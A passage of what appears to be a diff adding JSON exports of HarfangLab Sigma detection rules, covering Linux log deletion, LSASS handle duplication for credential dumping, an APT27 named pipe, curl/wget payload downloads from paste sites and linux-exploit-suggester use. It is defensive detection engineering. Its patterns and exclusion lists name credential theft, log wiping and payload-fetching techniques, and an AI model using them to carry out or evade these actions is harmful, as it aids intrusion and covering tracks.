"0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:35.297021Z", + "creation_date": "2026-03-23T11:45:35.297023Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:35.297028Z", + "rule_level": "medium", + "rule_confidence": "weak", + "rule_confidence_override": null, + "references": [ + "https://atomicredteam.io/defense-evasion/T1070.002/", + "https://attack.mitre.org/techniques/T1070/002/" + ], + "name": "t1070_002_system_logs_removed_cli_linux.yml", + "content": "title: System Logs Removed via Command-line\nid: 249d762f-c5a2-406d-acf3-071a10d93210\ndescription: |\n Detects an attempt to remove any of the system's logs.\n Attackers can try to remove the system's logs to hide their tracks.\n It is recommended to investigate responsible for this action and to look for other malicious actions stemming from it.\nreferences:\n - https://atomicredteam.io/defense-evasion/T1070.002/\n - https://attack.mitre.org/techniques/T1070/002/\ndate: 2023/01/03\nmodified: 2026/03/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_bin:\n Image|endswith:\n - '/rm'\n - '/unlink'\n - '/shred'\n - '/truncate'\n ParentImage|contains: '?'\n\n selection_files:\n CommandLine|contains:\n - 'auth.log'\n - 'boot.log'\n - 'history.log'\n - 
'cron.log'\n - 'dmesg'\n - 'dpkg.log'\n - 'kern.log'\n - 'messages'\n - 'secure'\n - 'syslog'\n - 'utmp'\n - 'wtmp'\n - 'journal'\n\n selection_command:\n CommandLine|contains:\n - '/var/log'\n - '/var/logs'\n - '/var/audit'\n - '/run/log/journal'\n\n selection_directory:\n CurrentDirectory|contains:\n - '/var/log/'\n - '/var/logs/'\n - '/var/audit/'\n - '/run/log/journal/'\n\n filter_slash:\n CommandLine|contains: ' /'\n\n exclusion_cron:\n - ParentImage:\n - '/usr/sbin/cron'\n - '/usr/sbin/crond'\n - Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n\n exclusion_docker:\n - GrandparentCommandLine|startswith:\n - '/bin/sh /usr/bin/docker-containerd-shim '\n - '/usr/bin/docker-containerd-shim-current '\n - '/usr/libexec/docker/docker-runc-current '\n - Ancestors|contains:\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_debian_installer:\n - ParentImage: '/usr/bin/dpkg'\n - ProcessAncestors|contains: '|/usr/bin/dpkg|'\n\n exclusion_savelog:\n CommandLine: 'rm -f -- /var/log//dmesg.? 
/var/log//dmesg.?.gz'\n ParentCommandLine|contains|all:\n - 'savelog'\n - '/var/log/dmesg'\n GrandparentImage|endswith: '/systemd'\n\n exclusion_genesys:\n CommandLine|contains: 'rm -f *.log.gz'\n ParentCommandLine|contains: '/opt/genesys/logcompress.sh'\n\n exclusion_apt:\n Image:\n - '/usr/bin/apt-get'\n - '/usr/bin/apt'\n\n exclusion_pmlogger:\n - ParentCommandLine|contains:\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger_daily'\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger_check'\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_daily'\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_check'\n - GrandparentCommandLine|contains:\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger_daily'\n - '/bin/sh /usr/libexec/pcp/bin/pmlogger_check'\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_daily'\n - '/bin/sh /usr/lib/pcp/bin/pmlogger_check'\n\n exclusion_insights:\n CommandLine|contains: '/usr/bin/python /usr/bin/insights-client'\n\n exclusion_yum:\n GrandparentCommandLine|startswith: '/usr/libexec/platform-python /bin/yum'\n\n exclusion_intertel:\n - ParentCommandLine|contains: '/opt/intertel/bin/findcore'\n - GrandparentCommandLine|contains: '/opt/intertel/bin/findcore'\n\n exclusion_mbgui:\n GrandparentCommandLine: 'runsv mbgui'\n\n exclusion_nagios_group:\n ProcessGroup: 'nagios'\n ProcessAncestors|contains:\n - '/crond|'\n - '/naemon|'\n\n exclusion_nagios:\n - ParentCommandLine|contains:\n - 'check_scan_spal.sh'\n - 'check_snmp_svc'\n - 'check_snmp_load'\n - GrandparentCommandLine|contains:\n - 'check_scan_spal.sh'\n - 'check_snmp_svc'\n - 'check_snmp_load'\n - ParentCommandLine|startswith:\n - '/bin/sh /srv/tomcat/scripts/'\n - '/bin/bash /srv/tomcat/scripts/'\n - GrandparentCommandLine|startswith:\n - '/bin/sh /srv/tomcat/scripts/'\n - '/bin/bash /srv/tomcat/scripts/'\n\n exclusion_popularity_contest:\n - ParentCommandLine: '/bin/sh /etc/cron.daily/popularity-contest'\n - GrandparentCommandLine: '/bin/sh /etc/cron.daily/popularity-contest'\n\n exclusion_moodle_sortlogs:\n ParentCommandLine: 'bash 
/usr/local/bin/moodle_sortlogs /var/log/moodle/cron /var/log/moodle'\n\n exclusion_pmcd:\n ParentCommandLine:\n - '/bin/sh /usr/libexec/pcp/lib/pmcd start-systemd'\n - '/bin/sh /usr/share/pcp/lib/pmcd start'\n\n exclusion_qradar:\n ParentCommandLine|contains:\n - '--login /opt/qradar/perf/systemStabMon -interval ??'\n - '/opt/qradar/bin/check_date_change.sh'\n\n exclusion_logrote:\n - ProcessParentImage: '/usr/sbin/logrotate'\n - ProcessAncestors|contains: '|/usr/sbin/logrotate|'\n\n exclusion_eset:\n ProcessAncestors|contains: '|/opt/eset/RemoteAdministrator/Agent/ERAAgent|'\n\n exclusion_purge:\n ProcessImage:\n - '/bin/rm'\n - '/usr/bin/rm'\n ProcessParentImage:\n - '/bin/find'\n - '/usr/bin/find'\n ProcessParentCommandLine|contains|all:\n - ' -mtime '\n - ' -exec '\n\n condition: selection_bin and selection_files and (selection_command or (selection_directory and not filter_slash)) and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "249d762f-c5a2-406d-acf3-071a10d93210", + "rule_name": "System Logs Removed via Command-line", + "rule_description": "Detects an attempt to remove any of the system's logs.\nAttackers can try to remove the system's logs to hide their tracks.\nIt is recommended to investigate responsible for this action and to look for other malicious actions stemming from it.\n", + "rule_creation_date": "2023-01-03", + "rule_modified_date": "2026-03-10", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1070.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "24c0c873-a33d-4075-bcfe-ed95f209f435", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.085199Z", + "creation_date": "2026-03-23T11:45:34.085201Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.085206Z", + "rule_level": "critical", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://rastamouse.me/dumping-lsass-with-duplicated-handles/", + "https://github.com/fortra/nanodump?tab=readme-ov-file#handle-duplication" + ], + "name": "t1003_001_lsass_handle_duplicated.yml", + "content": "title: Lsass Handle with VM Read Granted Access Duplicated\nid: 24c0c873-a33d-4075-bcfe-ed95f209f435\ndescription: |\n Detects LSASS handle duplication with PROCESS_VM_READ access rights targeting credential extraction.\n The Local Security Authority Subsystem Service (LSASS) is a critical Windows process that handles authentication. Threat actors frequently target LSASS to extract credentials stored in memory.\n Handle duplication is a technique where attackers duplicate an existing handle to LSASS rather than directly opening a new handle, which can be more evasive against security solutions. 
Tools like Nanodump leverage this approach to dump LSASS memory while avoiding detection by antivirus and endpoint detection and response (EDR) systems.\n It is recommended to investigate the parent process and command line arguments of the process performing the handle duplication, check for additional suspicious activities in the process tree, and validate whether the process has legitimate reasons to access LSASS memory.\nreferences:\n - https://rastamouse.me/dumping-lsass-with-duplicated-handles/\n - https://github.com/fortra/nanodump?tab=readme-ov-file#handle-duplication\ndate: 2025/04/29\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessDuplicateHandle\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.LSASSAccess\nlogsource:\n product: windows\n category: process_duplicate_handle\ndetection:\n selection:\n TargetImage|endswith: '\\lsass.exe'\n GrantedAccessStr|contains: 'PROCESS_VM_READ'\n AgentVersion|gte|version: 4.9.0\n\n exclusion_csrss:\n CallerImage:\n - '?:\\Windows\\System32\\csrss.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\csrss.exe'\n - '\\Device\\VhdHardDisk*\\Windows\\System32\\csrss.exe'\n CallerIsDestination: true\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_hp:\n CallerImage: '?:\\Program Files\\HP\\Sure Click\\bin\\Br-init-o.exe'\n ProcessSignature|contains: 'Bromium'\n ProcessSigned: 'true'\n\n exclusion_kaspersky:\n CallerImage|startswith: '?:\\Program Files (x86)\\Kaspersky Lab\\'\n ProcessSignature|contains: 'Kaspersky Lab'\n ProcessSigned: 'true'\n\n exclusion_nable:\n CallerImage|startswith: '?:\\Program Files (x86)\\N-able Technologies\\'\n ProcessSignature:\n - 'N-ABLE TECHNOLOGIES LTD'\n - 'Solarwinds Worldwide, LLC'\n ProcessSigned: 'true'\n\n exclusion_werfault:\n CallerImage|startswith:\n - 
'?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\WerFaultSecure.exe'\n - '?:\\Windows\\SysWOW64\\WerFaultSecure.exe'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_werfault_commandline:\n ProcessCommandLine: '?:\\windows\\System32\\svchost.exe -k WerSvcGroup'\n ProcessSignature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n exclusion_windows_task_tools:\n CallerImage:\n - '?:\\Windows\\System32\\tasklist.exe'\n - '?:\\Windows\\System32\\taskkill.exe'\n - '?:\\Windows\\System32\\Taskmgr.exe.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_sentinelone:\n CallerImage|startswith: '?:\\Program Files\\SentinelOne\\'\n ProcessSignature: 'Sentinelone, Inc.'\n ProcessSigned: 'true'\n\n exclusion_perfmon:\n CallerImage: '?:\\Windows\\System32\\perfmon.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_windows_cluster_binaries:\n ProcessOriginalFileName:\n - 'rhs.exe'\n - 'clussvc.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_checkpoint:\n CallerImage|startswith: '?:\\Program Files (x86)\\CheckPoint\\'\n ProcessSignature: 'Check Point Software Technologies Ltd.'\n ProcessSigned: 'true'\n\n exclusion_dnspy:\n ProcessSha256:\n - '6674538f0c1bfb2b02921aebea81654dd196efbfe520c1c34d4872908a205a9d'\n - 'bc1c4e0fc49c138bbfc223d3e94231cd4884439c663646d91e48fa005df6704a'\n\n exclusion_pythonservice:\n ProcessSha256: '29a187322c91af564eb259b6b2834d0530d9c7bf0f7c7e42a1c911679cdb745e'\n\n # Covered by another specific rule\n exclusion_procdump:\n ProcessOriginalFileName:\n - 'procdump.exe'\n - 'procdump'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n # Covered by another specific rule\n exclusion_rdrleakdiag:\n CallerImage: '?:\\Windows\\System32\\rdrleakdiag.exe'\n ProcessSignature:\n - 
'Microsoft Corporation'\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n ProcessSigned: 'true'\n\n # This is handled by the rule 78397a73-7ba5-4e02-8847-6a3242d29f28\n exclusion_taskmgr:\n CallerImage: '?:\\Windows\\System32\\Taskmgr.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_sccm:\n CallerImage: '?:\\Windows\\CCM\\CcmExec.exe'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_adobe:\n ProcessOriginalFileName: 'Creative Cloud.exe'\n ProcessSignature: 'Adobe Inc.'\n ProcessSigned: 'true'\n\n exclusion_elastic:\n CallerImage: '?:\\Program Files\\Elastic\\Endpoint\\elastic-endpoint.exe'\n ProcessSignature: 'Elasticsearch, Inc.'\n ProcessSigned: 'true'\n\n exclusion_internet_explorer:\n CallerImage: '?:\\Program Files\\Internet Explorer\\iexplore.exe'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_alibaba:\n CallerImage|startswith: '?:\\Program Files (x86)\\AlibabaProtect\\'\n ProcessSignature: 'ALIBABA (CHINA) NETWORK TECHNOLOGY CO.,LTD.'\n ProcessSigned: 'true'\n\n exclusion_mcafee:\n CallerImage|startswith: '?:\\Program Files\\McAfee\\'\n ProcessSignature|contains: 'McAfee, Inc.'\n ProcessSigned: 'true'\n\n exclusion_fsecure:\n CallerImage|startswith: '?:\\Program Files (x86)\\F-Secure\\'\n ProcessSignature|contains: 'WithSecure Oyj'\n ProcessSigned: 'true'\n\n exclusion_lsass:\n CallerImage|startswith: '?:\\Windows\\system32\\lsass.exe'\n ProcessSigned: 'true'\n\n exclusion_wsmprovhost_to_itself:\n CallerImage: '?:\\Windows\\System32\\wsmprovhost.exe'\n SourceImage: '?:\\Windows\\System32\\wsmprovhost.exe'\n\n exclusion_powershell_to_itself:\n - CallerImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n SourceImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - CallerImage: '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n SourceImage: '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n\n exclusion_powertoys:\n 
ProcessOriginalFileName: 'PowerToys.FileLocksmithUI.dll'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_fileassassin:\n ProcessOriginalFileName: 'FileASSASSIN.exe'\n ProcessCompany: 'Malwarebytes'\n\n exclusion_setup:\n ProcessOriginalFileName: 'SetupHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ProcessSigned: 'true'\n\n exclusion_symantec:\n CallerImage: '?:\\Program Files (x86)\\Common Files\\Symantec Shared\\COH\\COH64.exe'\n ProcessSignature: 'Symantec Corporation'\n ProcessSigned: 'true'\n\n exclusion_jetbrains:\n ProcessOriginalFileName: 'JetBrains.ReSharperUltimate.LightInstaller'\n ProcessSignature: 'JetBrains s.r.o.'\n ProcessSigned: 'true'\n\n exclusion_system_informer:\n ProcessOriginalFileName: 'System Informer.exe'\n ProcessSignature: 'Winsider Seminars & Solutions Inc.'\n ProcessSigned: 'true'\n\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "24c0c873-a33d-4075-bcfe-ed95f209f435", + "rule_name": "Lsass Handle with VM Read Granted Access Duplicated", + "rule_description": "Detects LSASS handle duplication with PROCESS_VM_READ access rights targeting credential extraction.\nThe Local Security Authority Subsystem Service (LSASS) is a critical Windows process that handles authentication. Threat actors frequently target LSASS to extract credentials stored in memory.\nHandle duplication is a technique where attackers duplicate an existing handle to LSASS rather than directly opening a new handle, which can be more evasive against security solutions. 
Tools like Nanodump leverage this approach to dump LSASS memory while avoiding detection by antivirus and endpoint detection and response (EDR) systems.\nIt is recommended to investigate the parent process and command line arguments of the process performing the handle duplication, check for additional suspicious activities in the process tree, and validate whether the process has legitimate reasons to access LSASS memory.\n", + "rule_creation_date": "2025-04-29", + "rule_modified_date": "2026-02-23", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.credential_access" + ], + "rule_technique_tags": [ + "attack.t1003.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "24ca43a5-7027-4676-8c7f-991dff78cc7c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.607956Z", + "creation_date": "2026-03-23T11:45:34.607971Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.607979Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.intrinsec.com/apt27-analysis/", + 
"https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html", + "https://attack.mitre.org/techniques/T1106/" + ], + "name": "t1106_apt27_named_pipe_creation.yml", + "content": "title: Suspicious APT27 Related Named Pipe Created\nid: 24ca43a5-7027-4676-8c7f-991dff78cc7c\ndescription: |\n Detects the creation or connection of/to a Named Pipe named \"testPipe\".\n The name is related to the APT27 threat, more specifically their HyperBro malware.\n It is recommended to verify that this is a legitimate developer pipe.\nreferences:\n - https://www.intrinsec.com/apt27-analysis/\n - https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html\n - https://attack.mitre.org/techniques/T1106/\ndate: 2022/10/26\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1106\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.ThreatActor.APT27\n - classification.Windows.Malware.HyperBro\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: named_pipe_creation\ndetection:\n selection:\n PipeName: '\\testPipe'\n\n exclusion_hellodoc:\n ProcessImage|endswith:\n - '\\IMAGINE Editions\\HelloDoc\\HelloDoc.exe'\n - '\\imagine editions\\hellodoc\\HelloDoc Acces Vidal.exe'\n ProcessSigned: 'true'\n\n condition: selection and not 1 of exclusion_*\nfalsepositives:\n - Legitimate developer creation of a named pipe called \"testPipe\"\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "24ca43a5-7027-4676-8c7f-991dff78cc7c", + "rule_name": "Suspicious APT27 Related Named Pipe Created", + "rule_description": "Detects the creation or connection of/to a Named Pipe named \"testPipe\".\nThe name is related to the APT27 threat, more specifically their HyperBro malware.\nIt is recommended to verify 
that this is a legitimate developer pipe.\n", + "rule_creation_date": "2022-10-26", + "rule_modified_date": "2025-04-14", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.execution" + ], + "rule_technique_tags": [ + "attack.t1106", + "attack.t1559" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "250b3fce-b831-41da-8d48-7ece2c3de1e0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "moderate", + "alert_count": 1, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.599825Z", + "creation_date": "2026-03-23T11:45:34.599829Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.599836Z", + "rule_level": "high", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://attack.mitre.org/techniques/T1105/", + "https://attack.mitre.org/techniques/T1071/001/" + ], + "name": "t1105_curl_suspicious_link_linux.yml", + "content": "title: File Downloaded via curl or wget from Suspicious URL (Linux)\nid: 250b3fce-b831-41da-8d48-7ece2c3de1e0\ndescription: |\n Detects the usage of curl or wget to download a file from public hosting services that may contain a malicious payload.\n This technique is used by attackers to download 
payloads that are hosted on public websites.\n It is recommended to perform an analysis of the downloaded file to check if the content is malicious.\nreferences:\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/01/27\nmodified: 2025/10/28\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.t1071.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Curl\n - classification.Linux.Behavior.FileDownload\n - classification.Linux.Behavior.NetworkActivity\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/wget'\n - '/wget2' # https://discussion.fedoraproject.org/t/f40-change-proposal-wget2-as-wget/96422\n - '/curl'\n CommandLine|contains:\n - 'cdn.discordapp.com'\n - 'api.telegram.org'\n - 'www.dropbox.com'\n - 'api.dropboxapi.com'\n - 'content.dropboxapi.com'\n - 'transfer.sh'\n - 'anonfiles.com'\n - 'gofile.io'\n - 'file.io'\n - 'raw.githubusercontent.com'\n - 'gist.githubusercontent.com'\n - 'pastebin.com'\n - 'mediafire.com'\n - 'mega.nz'\n - 'ddns.net'\n - '.paste.ee'\n - '.hastebin.com'\n - '.ghostbin.co/'\n - 'ufile.io'\n - 'storage.googleapis.com'\n - 'send.exploit.in'\n - 'privatlab.net'\n - 'privatlab.com'\n - 'sendspace.com'\n - 'pastetext.net'\n - 'pastebin.pl'\n - 'paste.ee'\n - 'pastie.org'\n - 'artchive.org'\n - 'paste.c-net.org'\n\n # https://github.com/gianlucaborello/libprocesshider/archive/refs/heads/master.zip\n # https://github.com/gianlucaborello/libprocesshider/archive/25e0587d6bf2137f8792dc83242b6b0e5a72b415.zip\n - 'https://github.com/*/archive/*.zip'\n\n exclusion_legitimate_url:\n CommandLine|contains:\n - ' https://raw.githubusercontent.com/Orange-Cyberdefense/*IOC'\n - ' https://raw.githubusercontent.com/google/'\n - ' https://raw.githubusercontent.com/Homebrew/'\n - ' https://raw.githubusercontent.com/wp-cli/'\n - ' https://raw.githubusercontent.com/nextcloud/'\n - 
' https://raw.githubusercontent.com/laurent22/joplin/'\n - ' https://raw.githubusercontent.com/ohmyzsh/'\n - ' https://raw.githubusercontent.com/nvm-sh/'\n - ' https://raw.githubusercontent.com/docker-library/'\n - ' https://raw.githubusercontent.com/anchore/'\n - ' https://storage.googleapis.com/git-repo-downloads/'\n - ' https://github.com/scylladb/'\n - ' https://raw.githubusercontent.com/microsoft/'\n - ' https://raw.githubusercontent.com/community-scripts/ProxmoxVE/'\n - ' https://raw.githubusercontent.com/helm/'\n - ' https://raw.githubusercontent.com/pyenv/'\n - ' https://raw.githubusercontent.com/onyx-dot-app/'\n\n exclusion_commandline:\n CommandLine|contains: 'curl -vvv --max-time 0 --proxy * --proxy-user * -H Authorization: Bearer '\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n - '|/usr/bin/dockerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_netdata:\n - CommandLine|contains:\n - ' https://raw.githubusercontent.com/netdata/netdata/master/packaging/installer/'\n - ' https://storage.googleapis.com/netdata-nightlies/'\n - ParentCommandLine: 'bash /etc/cron.daily/netdata-updater'\n\n exclusion_clamav:\n ParentCommandLine: '/usr/bin/bash /usr/local/sbin/clamav-unofficial-sigs.sh'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "250b3fce-b831-41da-8d48-7ece2c3de1e0", + "rule_name": "File Downloaded via curl or wget from Suspicious URL (Linux)", + "rule_description": "Detects the usage of curl or wget to download a file from public hosting services that may contain a malicious payload.\nThis technique is used by attackers to download payloads that are hosted on public websites.\nIt is recommended to perform an analysis of the downloaded file to check if the content is malicious.\n", + "rule_creation_date": "2023-01-27", + "rule_modified_date": "2025-10-28", 
+ "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control" + ], + "rule_technique_tags": [ + "attack.t1071.001", + "attack.t1105" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "252c798b-019c-4d67-848f-3b675cd5c18f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.613378Z", + "creation_date": "2026-03-23T11:45:34.613381Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.613389Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/mzet-/linux-exploit-suggester/", + "https://attack.mitre.org/techniques/T1595/002/" + ], + "name": "t1595_002_linux_exp_suggester_bash.yml", + "content": "title: Linux-Exploit-Suggester Hacktool Executed via Bash\nid: 252c798b-019c-4d67-848f-3b675cd5c18f\ndescription: |\n Detects the execution of linux-exploit-suggester, an open-source shell script for suggesting privilege escalation exploits on Linux.\n Adversaries may use this script to identify a way to elevate their privileges.\n It is recommended to check for other suspicious activities by the process' 
parent.\nreferences:\n - https://github.com/mzet-/linux-exploit-suggester/\n - https://attack.mitre.org/techniques/T1595/002/\ndate: 2022/11/21\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.t1595.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Script.Bash\n - classification.Linux.HackTool.LinuxExploitSuggester\n - classification.Linux.Behavior.Discovery\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_script:\n CommandLine|contains: 'linux-exploit-suggester.sh'\n filter_script:\n ParentCommandLine|contains: 'linux-exploit-suggester.sh'\n\n selection_cmd:\n CommandLine:\n - \"grep -E -i ^networkmanager-vpnc|network-manager-vpnc-[0-9]+\"\n - \"grep -E -i ^polkit|policykit-1-[0-9]+\"\n\n condition: (selection_script and not filter_script) or selection_cmd\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "252c798b-019c-4d67-848f-3b675cd5c18f", + "rule_name": "Linux-Exploit-Suggester Hacktool Executed via Bash", + "rule_description": "Detects the execution of linux-exploit-suggester, an open-source shell script for suggesting privilege escalation exploits on Linux.\nAdversaries may use this script to identify a way to elevate their privileges.\nIt is recommended to check for other suspicious activities by the process' parent.\n", + "rule_creation_date": "2022-11-21", + "rule_modified_date": "2025-04-14", + "rule_os": "linux", + "rule_status": null, + "rule_tactic_tags": [], + "rule_technique_tags": [ + "attack.t1595.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "254f2253-5e75-41de-a4fb-bbfa86c1a831", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + 
